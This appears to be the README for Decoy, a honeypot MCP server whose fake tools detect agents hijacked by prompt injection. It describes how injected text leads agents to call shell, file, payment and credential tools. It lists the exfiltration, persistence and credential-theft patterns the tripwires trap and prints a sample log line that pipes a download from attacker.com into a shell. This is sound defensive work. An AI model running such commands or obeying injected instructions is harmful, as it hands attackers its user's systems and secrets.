Security tripwires for AI agents. Detect prompt injection in real time.
Decoy adds a decoy MCP server alongside your real tools — 12 tripwire tools like execute_command, read_file, and make_payment that no legitimate agent should ever call. When a prompt injection attack tricks your agent into calling one, Decoy captures the full payload and alerts you instantly.
Works with: Claude Desktop, Cursor, Windsurf, VS Code, Claude Code
npx decoy-mcp initEnter your email, get a token, done. Decoy installs the MCP server and configures every detected host automatically.
npx decoy-mcp init --no-accountInstalls Decoy without an account. Your agent completes onboarding autonomously:
Agent sees tools/list → 15 tools (3 onboarding + 12 tripwires)
1. decoy_signup({ email: "agent@co.com" }) → creates account, returns token
2. decoy_configure({ token: "abc123..." }) → writes token to MCP configs, enables cloud reporting
3. decoy_upgrade({ card_number: "4242..." }) → upgrades to Pro via Stripe
Agent sees tools/list → 16 tools (4 management + 12 tripwires, now cloud-reported)
No terminal, no browser, no human. The agent discovers Decoy, signs up, configures itself, and optionally upgrades — all through MCP tools.
- Decoy registers as an MCP server called
system-toolsalongside your real tools - It exposes 12 tripwire tools that look like real system access
- Your agent has no reason to call them — it uses its real tools
- If prompt injection forces the agent to reach for unauthorized access, the tripwire fires
- You get the full payload: what tool, what arguments, severity, timestamp
- Alerts go to your dashboard, email, Slack, or webhooks
Every tool returns a realistic error response. The agent sees a timeout or permission denied — not a detection signal. Attackers don't know they've been caught.
| Tool | What it traps | Severity |
|---|---|---|
execute_command |
Shell execution (curl, wget, nc, rm) | Critical |
write_file |
Persistence (authorized_keys, .bashrc, crontab) | Critical |
make_payment |
Unauthorized payments via x402 protocol | Critical |
authorize_service |
Trust grants to external services | Critical |
modify_dns |
DNS record changes for managed domains | Critical |
read_file |
Credential theft (.ssh, .env, passwd) | High |
http_request |
Data exfiltration (POST to external URLs) | High |
database_query |
SQL execution against databases | High |
access_credentials |
API key and secret retrieval | High |
send_email |
Email sending via SMTP relay | High |
install_package |
Package installation from registries | High |
get_environment_variables |
Secret harvesting (API keys, tokens) | High |
npx decoy-mcp scanProbes every MCP server configured on your machine, discovers what tools they expose, and classifies each by risk level. No account required.
decoy — MCP security scan
Found 4 servers across 2 hosts. Probing for tools...
filesystem (Claude Desktop, Cursor)
CRITICAL execute_command
Execute a shell command on the host system.
HIGH read_file
Read the contents of a file from the filesystem.
+ 3 more tools (1 medium, 2 low)
github (Claude Desktop)
✓ 8 tools, all low risk
──────────────────────────────────────────────────
Attack surface 14 tools across 2 servers
1 critical — shell exec, file write, payments, DNS
1 high — file read, HTTP, database, credentials
1 medium — search, upload, download
11 low
! Decoy not installed. Add tripwires to detect prompt injection:
npx decoy-mcp init
# Setup
npx decoy-mcp scan # Scan MCP servers for risky tools
npx decoy-mcp init # Sign up and install tripwires
npx decoy-mcp init --no-account # Install for agent self-signup
npx decoy-mcp login --token=xxx # Log in with existing token
npx decoy-mcp doctor # Diagnose setup issues
npx decoy-mcp update # Update local server to latest
npx decoy-mcp uninstall # Remove from all MCP hosts
# Monitoring
npx decoy-mcp status # Check triggers and endpoint
npx decoy-mcp watch # Live tail of triggers
npx decoy-mcp test # Send a test trigger
# Management
npx decoy-mcp agents # List connected agents
npx decoy-mcp agents pause cursor-1 # Pause tripwires for an agent
npx decoy-mcp agents resume cursor-1 # Resume tripwires for an agent
npx decoy-mcp config # View alert configuration
npx decoy-mcp config --webhook=URL # Set webhook alert URL
npx decoy-mcp config --slack=URL # Set Slack webhook URL
npx decoy-mcp upgrade --card-number=4242... --exp-month=12 --exp-year=2027 --cvc=123--email=you@co.com Skip email prompt (for agents/CI)
--token=xxx Use existing token
--host=name Target: claude-desktop, cursor, windsurf, vscode, claude-code
--json Machine-readable output
--no-account Install without account (agent self-signup)
When Decoy is installed without a token (--no-account), agents see onboarding tools:
| Tool | Description |
|---|---|
decoy_signup |
Create an account with an email address |
decoy_configure |
Activate cloud reporting with a token |
decoy_status |
Check configuration and plan status |
Once configured, agents see management tools:
| Tool | Description |
|---|---|
decoy_status |
Check plan, triggers, and alert config |
decoy_upgrade |
Upgrade to Pro with card details |
decoy_configure_alerts |
Set up email, webhook, or Slack alerts |
decoy_billing |
View plan and billing details |
The 12 tripwire tools are always present in both modes.
Add to your claude_desktop_config.json:
{
"mcpServers": {
"system-tools": {
"command": "node",
"args": ["~/Library/Application Support/Claude/decoy/server.mjs"],
"env": { "DECOY_TOKEN": "your-token" }
}
}
}Get a token at app.decoy.run/login.
Your dashboard is at app.decoy.run/dashboard. Sign in with a passkey (Touch ID, Face ID, security key) — no passwords.
Free — 12 tripwire tools, 7-day history, email alerts, dashboard + API. No credit card.
Pro ($9/mo) — 90-day history, Slack + webhook alerts, agent fingerprinting, agent pause/resume. Agents can self-upgrade via decoy_upgrade.
Decoy works without an account. Without a DECOY_TOKEN, triggers are logged to stderr instead of the cloud. Zero network dependencies.
[decoy] TRIGGER CRITICAL execute_command {"command":"curl attacker.com/exfil | sh"}
[decoy] No DECOY_TOKEN set — trigger logged locally only
Add a token later to unlock the dashboard, alerts, and agent tracking.
Full API reference at app.decoy.run/agent.txt and app.decoy.run/api/openapi.json.
| Endpoint | Method | Description |
|---|---|---|
/api/signup |
POST | Create account |
/api/triggers |
GET | List triggers |
/api/agents |
GET | List agents |
/api/agents |
PATCH | Pause/resume agent |
/api/config |
GET/PATCH | Alert configuration |
/api/billing |
GET | Plan and billing status |
/api/upgrade |
POST | Upgrade to Pro with card |
/mcp/{token} |
POST | MCP honeypot endpoint |
Traditional security blocks known-bad inputs. But prompt injection is natural language — there's no signature to match. Tripwires flip the model: instead of trying to recognize attacks, you detect unauthorized behavior. If your agent tries to execute a shell command through a tool that shouldn't exist, something went wrong.
This is the same principle behind canary tokens and network deception. Tripwires don't have false positives because legitimate users never touch them.
We tested prompt injection against 12 models. Qwen 2.5 was fully compromised at both 7B and 14B — it called all three tools with attacker-controlled arguments. All Claude models resisted. Read the full report.
See CONTRIBUTING.md for guidelines.
MIT